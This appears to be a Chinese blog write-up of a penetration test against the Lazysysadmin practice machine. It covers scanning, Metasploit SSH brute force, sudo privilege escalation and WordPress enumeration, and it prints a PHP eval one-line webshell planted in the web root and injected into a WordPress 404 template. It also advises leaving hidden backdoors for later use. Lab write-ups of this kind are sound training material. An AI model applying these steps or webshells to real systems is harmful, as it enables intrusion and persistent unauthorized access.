靶机渗透(一)Lazysysadmin
靶机Lazysysadmin
一、实验环境
二、实验步骤
(一)信息收集
1.查询测试机IP地址,判断所处网段
2.主机发现(netdiscover)
3.端口扫描(masscan/namp)
(二)漏洞扫描
1.开启nessusd服务,加载插件,登录
2.建立扫描
3.扫描结果
(三)ssh爆破(22端口)
1.启动msf终端
2.搜索ssh_login的相关工具和攻击荷载
3.启用漏洞利用模块,并查看需要设置的相关项
4.设置目标主机的IP地址
5.设置登录用户的用户文件
6.设置暴力破解的密码文件路径
7.开始向目标主机爆破ssh的登录账号和密码
8.远程连接目标主机
9.终极三问
10.查询/etc/passwd文件权限
11.查看当前用户togie允许命令的权限信息
12.提权
13.上传后门文件(一句话木马)
14.启用中国菜刀,获取webshell权限(后门测试)
(四)http服务(80端口)
1.目标机开启apache服务,尝试web渗透
2.网站指纹信息扫描(whatweb)
3.目录扫描(dirb)
4.打开目标主机的php配置文件
5.查看防爬虫机器人文件
6.查看搭站模板文件
7.查看搭站后台
8.查看phpmyadmin后台登录界面
(五)ircd 互联网中继聊天守护进程(6667端口)
1.启动msf终端
2.搜索模块
3.启用漏洞利用模块,并查看需要设置的相关项
4.设置目标主机的IP地址
5.执行
一、实验环境
1.靶机:Lazysysadmin
2.测试机:Kali
3.帮凶机:Windows 10
4.扫描工具:Nesssus
二、实验步骤
(一)信息收集
1.查询测试机IP地址,判断所处网段
- 测试机(Kali)所处网段为:192.168.10.0/24
2.主机发现(netdiscover)
netdiscover -i eth0 -r 192.168.10.0/24
发现四台主机,分别为:192.168.10.1、192.168.10.2、192.168.10.140、192.168.10.254
nmap扫描时,会发现测试机本机的IP信息,而netdiscover命令则不会
3.端口扫描(masscan/namp)
masscan --rate=10000 --ports 0-65535 192.168.10.140
nmap -sV -T4 -p 6667,22,445,80,139,3306 192.168.10.140
masscan扫描速度快,但准确率不高,多扫描几次,防止漏扫
namp:-T4(分为0-5等级;-sV(版本信息与开启服务);-A(详细扫描开放的端口的具体服务)
与masscan相比,namp更详细,但是速度较慢(可以先使用masscan扫描出端口,再用nmap详细扫描开放的端口)
开启了6667(ircd 互联网中继聊天守护进程),22(ssh服务),139、445(smaba共享服务),80(Apache服务),3306(MySQL)端口
(二)漏洞扫描
1.开启nessusd服务,加载插件,登录
/etc/init.d/nessusd start
2.建立扫描
3.扫描结果
(三)ssh爆破(22端口)
原理:靶机用户存在弱口令漏洞,利用枚举的方法破解目标主机ssh服务(使用Metasploit)
1.启动msf终端
msfconsole
2.搜索ssh_login的相关工具和攻击荷载
search ssh_login
3.启用漏洞利用模块,并查看需要设置的相关项
use auxiliary/scanner/ssh/ssh_login
show options
4.设置目标主机的IP地址
set rhosts 192.168.10.140
5.设置登录用户的用户文件
set user_file /root/user.txt
6.设置暴力破解的密码文件路径
set pass_file /root/pass.txt
7.开始向目标主机爆破ssh的登录账号和密码
exploit
8.远程连接目标主机
ssh togie@192.168.10.140
9.终极三问
whoami———>pwd———>uname -a
10.查询/etc/passwd文件权限
ls -l /etc/passwd
/etc/passwd仅root拥有可读可写权限,togie只拥有可读权限
11.查看当前用户togie允许命令的权限信息
sudo -l
togie用户在本机上允许命令的权限为所有
togie用户所在组为:sudo
12.提权
sudo su root
获取root权限
13.上传后门文件(一句话木马)
<?php @eval($_POST[cmd]);?>
后门文件(一句话木马),可以多放几个在不同目录(必须是在/var/www/html目录下),使用不同文件名(隐藏深点)
也可以使用webacoo工具自动生成一句话木马(webacoo -g -o 1.php)
14.启用中国菜刀,获取webshell权限(后门测试)
http://192.168.10.140/1.php
只要后门没有被清除,都可以用菜刀为所欲为
(四)http服务(80端口)
1.目标机开启apache服务,尝试web渗透
http://192.168.10.140
- 页面无法进行任何操作
2.网站指纹信息扫描(whatweb)
whatweb 192.168.10.140
3.目录扫描(dirb)
dirb http://192.168.10.140 #使用默认字典进行扫描
dpkg -L dirb
dirb http://192.168.10.140 /usr/share/dirb/wordlists/big.txt
扫描到几个可查看利用路径
4.打开目标主机的php配置文件
http://192.168.10.140/info.php
该配置文件,含有目标主机服务器的各项配置,若被攻击者拿到,风险极高
5.查看防爬虫机器人文件
http://192.168.10.140/robots.txt
此文件中的路径,是不会被爬虫机器人爬虫的(证明此中路径或许隐藏重要信息)
遗憾的是,并未从这些路径获取到有用信息
6.查看搭站模板文件
http://192.168.10.140/wordpress
发现疑似用户名的信息(togie)
猜测用户名为togie,密码为12345,并验证成功
7.查看搭站后台
http://192.168.10.140/wordpress/wp-login.php
a.使用wp-config.php中获取的账号密码,登录搭站后台
b.制作后门文件(在404页面注入一句话木马)
<?php @eval($_POST[cmd]);?>
c.输入错误路径,打开404页面
d.启用中国菜刀,获取webshell权限(后门测试)
http://192.168.10.140/wordpress/?p=658349023943294
>搭站模板漏洞扫描(wpscan)
wpscan -u http://192.168.10.140/wordpress -e vp,vt,tt#vp 只枚举有漏洞的插件,vt只枚举存在漏洞的主题,tt列举缩略图相关的文件
wpscan -u http://192.168.10.140/wordpress -e u
wpscan -u http://192.168.10.140/wordpress -U Admin -P /etc/password.txt
枚举wordpress的用户,发现一个用户Admin,并尝试爆破Admin密码,未成功
8.查看phpmyadmin后台登录界面
http://192.168.10.140/phpmyadmin
尝试弱口令/用户名togie密码12345,并未成功
尝试使用wp-config.php中获取的账号密码,成功登录数据库
虽然成功登录,但权限过低,无法查看数据库中的表
(五)ircd 互联网中继聊天守护进程(6667端口)
1.启动msf终端
msfconsole
2.搜索模块
search unreal_ircd_3281_backdoor
3.启用漏洞利用模块,并查看需要设置的相关项
use exploit/unix/irc/unreal_ircd_3281_backdoor
show options
4.设置目标主机的IP地址
set rhost 192.168.10.140
5.执行
exploit
- 6667端口利用无果
小结 :
1.拿到一个靶机,先对其进行信息收集(接下来使用nessus扫描漏洞也不错)
2.该靶机存在弱口令漏洞,可使用ssh爆破
2.获取的shell用户账号在sudo组内,可直接使用sudo命令进行提权
3.开启共享服务(139/445端口),可利用远程挂载,查看其中隐秘配置文件
4.开启http服务(80端口),对其目录进行爆破,并逐个(也可凭经验有针对性地)访问,发现漏洞
5.记得留后门,方便以后使用
靶机渗透(一)Lazysysadmin相关推荐
- 【VulnHub靶机渗透】三:Billu_b0x
VulnHub是一个安全平台,内含众多渗透测试的靶场镜像,只需要下载至本地并在虚拟机上运行,即可得到一个完整的渗透测试练习系统,每一个靶机都有相关目标去完成(万分感谢提供靶机镜像的同学). 文章目录 ...
- HA: SHERLOCK 靶机渗透取证
HA: SHERLOCK 靶机渗透取证 靶机描述: DescriptionHA: Sherlock! This lab is based on the famous investigator's jo ...
- [网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可 ...
- [HTB]“Heist”靶机渗透详细思路
今天我们来看一下hackthebox里的一个靶机"Heist",直接开始渗透. 一.信息搜集 先打开网站看看.是一个登陆框,使用弱口令和注入都无果.在网页中发现了 login as ...
- [网络安全自学篇] 七十五.Vulnhub靶机渗透之bulldog信息收集和nc反弹shell(三)
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步.前文分享了APT攻击检测溯源与常见APT组织的攻击案例,并介绍防御措施.这篇文章将讲 ...
- 【渗透测试】靶机渗透Vulnhub-bulldog
目录 前言 一.bulldog靶机安装 二.bulldog靶机渗透 1.信息搜集 2.Web渗透--后台登录 3.Web渗透--命令注入&nc反弹shell 4.权限提升 渗透步骤回顾 感悟 ...
- 靶机渗透【bulldog】
文章目录 *一. bulldog靶机安装* 1. 下载bulldog 2. 开启bulldog *二. bulldog靶机渗透* 1. 信息收集 2. Web渗透 3. 命令注入&nc反弹sh ...
- Bulldog靶机渗透
Bulldog靶机渗透 1. 获取地址IP,确定靶机IP是192.168.119.134 2.扫描目标主机信息 3.爆破目标主机目录 4.通过翻译得知这个网页是给承包商看的 5.查看网页的源码,查找有 ...
- 【VulnHub靶机渗透】一:BullDog2
在网上各位大佬WriteUp的帮助下,成功完成了第一次完整的靶机渗透测试(大佬NB!),现将详细过程及原理做简单整理. 文章目录 简介 渗透步骤 1.主机发现.端口扫描 2.Web扫描.漏洞发现 3. ...
- bulldog2 靶机渗透
bulldog2 靶机渗透 1.先做主机发现 2.查看目标靶机开通的服务,发现目标靶机只开通了80端口 3.使用http服务登录主页 4.发现网站关闭了注册功能 5.发现用户遍历漏洞 6.查看下载好的 ...
最新文章
- Android(java)学习笔记96:layout_weight使用注意事项
- facebook 直播_什么时候是在Facebook Live上直播的最佳时间? 我分析了5,000个Facebook帖子以找出答案。...
- 输入一个整数,判断是奇数还是偶数
- PyTorch 多分类损失函数
- springcloud全局过滤_微服务技术SpringCloud 互联网网站架构演变过程
- 课堂练习课下作业----用户场景分析
- 物联网大数据平台应具备的功能和特点
- OSTaskStkInit_FPE_x86()--浮点仿真任务栈初始化函数(分段寻址的地址转换为线性地址)
- java中volatile_java中volatile关键字的含义
- fedora15下GNOME3使用笔记
- 遥感导论网课_经典课程教材遥感导论.pdf
- ogg for bigdata hbase安装步骤
- 计算机主机mac地址怎么查,怎么查看电脑的Mac地址
- Win10桌面图标排列混乱
- cordova ios升级插件
- Excel VLOOKUP 多条件使用
- [4G5G专题-58]:L2 PDCP子层-分组数据汇聚控制协议架构、PDCP包格式、鲁棒性头压缩RoHC
- 双视图特征点匹配———使用RANSAC法剔除误差点
- Java GridBagLayout(网格包布局管理器)
- html文件无法找到,html文件无法打开